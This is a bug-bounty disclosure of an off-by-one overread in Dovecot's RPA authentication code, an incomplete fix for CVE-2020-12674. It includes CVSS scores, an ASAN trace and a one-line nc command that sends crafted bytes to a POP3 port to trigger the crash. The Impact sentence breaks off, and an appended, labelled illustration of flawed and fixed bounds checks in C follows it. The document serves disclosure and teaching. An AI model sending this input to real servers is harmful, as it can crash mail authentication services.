Aug 26, 2020 - 7:17 a.m.

Open-Xchange: Buffer overread off by one in `rpa_read_buffer`, incomplete fix for CVE-2020-12674

2020-08-26 07:17:35
Reporter: catenacyber
Source: hackerone.com
Bounty: $400
10

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

In function rpa_read_buffer, the condition in

	if (p > end)
		return 0;

	len = *p++;

is not strict enough.

It should be:

	if (p >= end)
		return 0;

	len = *p++;

The fix from https://github.com/dovecot/core/commit/69ad3c902ea4bbf9f21ab1857d8923f975dc6145 is not enough.

The ASAN stack trace is:

=================================================================
==27414==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000006be at pc 0x00010fd2dd33 bp 0x7ffedff66f00 sp 0x7ffedff66ef8
READ of size 1 at 0x6040000006be thread T0
    #0 0x10fd2dd32 in rpa_read_buffer mech-rpa.c:226
    #1 0x10fd2d757 in rpa_parse_token3 mech-rpa.c:283
    #2 0x10fd2c44b in mech_rpa_auth_phase2 mech-rpa.c:504
    #3 0x10fc99d79 in LLVMFuzzerTestOneInput fuzz-auth-server.c:169

Steps to reproduce should be:

(echo 'AUTH RPA'; echo -ne '`\x11\x06\x09`\x86H\x01\x86\xf8s\x01\x01\x01\x00\x04\x00\x00\x01'; echo -ne '`\x11\x06\x09`\x86H\x01\x86\xf8s\x01\x01\x00\x04A@A\x00')  | nc 127.0.0.1 110

Impact

This overread could cause a crash, but as an off-by-one, it is difficult
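The following is an added illustration of the bounds-check issue the report describes; it is not Dovecot's code and not part of the original report. It models a length-prefixed field reader (one length byte, then that many payload bytes, read from a cursor p that must stay below end) with two hypothetical helpers: flawed_guard_allows_read shows why `p > end` still lets the cursor dereference the byte at end (one past the buffer), fixed_guard_allows_read applies the `p >= end` check, and read_length_prefixed is a hardened reader that additionally verifies the declared length fits in the remaining input and in the output buffer. The sample input is constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a length-prefixed field reader like the one in the
 * report: one length byte followed by `len` payload bytes, parsed from [p, end).
 * This is an added educational example, not Dovecot's rpa_read_buffer. */

/* The original guard: `if (p > end) return 0;`. It lets p == end through,
 * and `*p++` then reads one byte past the buffer. No dereference happens here;
 * we only report what the predicate would permit. */
bool flawed_guard_allows_read(const unsigned char *p, const unsigned char *end)
{
    return !(p > end);
}

/* The corrected guard: `if (p >= end) return 0;`. p == end is rejected. */
bool fixed_guard_allows_read(const unsigned char *p, const unsigned char *end)
{
    return !(p >= end);
}

/* Hardened reader. Returns the payload length on success and advances *pp past
 * the field; returns -1 if the cursor is at or past end, or if the declared
 * length does not fit in the remaining input or in `out`. */
int read_length_prefixed(const unsigned char **pp, const unsigned char *end,
                         unsigned char *out, size_t out_size)
{
    const unsigned char *p = *pp;
    if (p >= end)                 /* the off-by-one fix: no length byte left */
        return -1;
    size_t len = *p++;
    if (len > (size_t)(end - p))  /* payload must be fully present */
        return -1;
    if (len > out_size)           /* and must fit the caller's buffer */
        return -1;
    memcpy(out, p, len);
    *pp = p + len;
    return (int)len;
}

int main(void)
{
    /* Constructed sample: a 3-byte field "abc", then an empty field, then end. */
    const unsigned char sample[] = { 0x03, 'a', 'b', 'c', 0x00 };
    const unsigned char *p = sample;
    const unsigned char *end = sample + sizeof sample;
    unsigned char out[16];
    int n;

    while ((n = read_length_prefixed(&p, end, out, sizeof out)) >= 0)
        printf("field of %d bytes\n", n);

    /* At this point p == end. The flawed guard would still allow a read. */
    printf("flawed guard allows read at end: %s\n",
           flawed_guard_allows_read(p, end) ? "yes" : "no");
    printf("fixed guard allows read at end:  %s\n",
           fixed_guard_allows_read(p, end) ? "yes" : "no");
    return 0;
}
```

The hardened reader is stricter than the report's minimal fix: it also refuses a length byte that promises more payload than remains, which is the same class of over-read one step later in the parse.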